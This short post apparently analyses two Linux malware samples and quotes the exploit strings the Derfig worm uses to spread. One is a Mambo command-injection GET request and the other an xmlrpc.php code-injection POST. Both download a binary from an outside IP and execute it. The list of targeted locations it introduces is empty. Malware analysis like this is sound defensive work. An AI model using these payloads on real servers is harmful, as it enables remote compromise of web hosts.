Skip navigation.

New Linux Malware

Two linux malware in zip.

session: infected: Backdoor.Linux.Keitan.c

derfig: infected: Net-Worm.Linux.Mare.e



The Derfig binary seems to spread via a Mambo and a xmlrpc.php vulns.

Mambo exploit from bin:
GET %sindex2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%%20209.123.16.34/gicumz;chmod%%20744%%20gicumz;./gicumz;echo%%20YYY;echo| HTTP/1.1

xmlrpc.php vuln:
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
test.method',''));echo '_begin_';echo `cd /tmp;wget;chmod +x gicumz;./gicumz `;echo '_end_';exit;/*

it looks for these vulns in the following locations:

Both of these binaries seem to have been built on Redhat 9 systems (from the compiler version strings).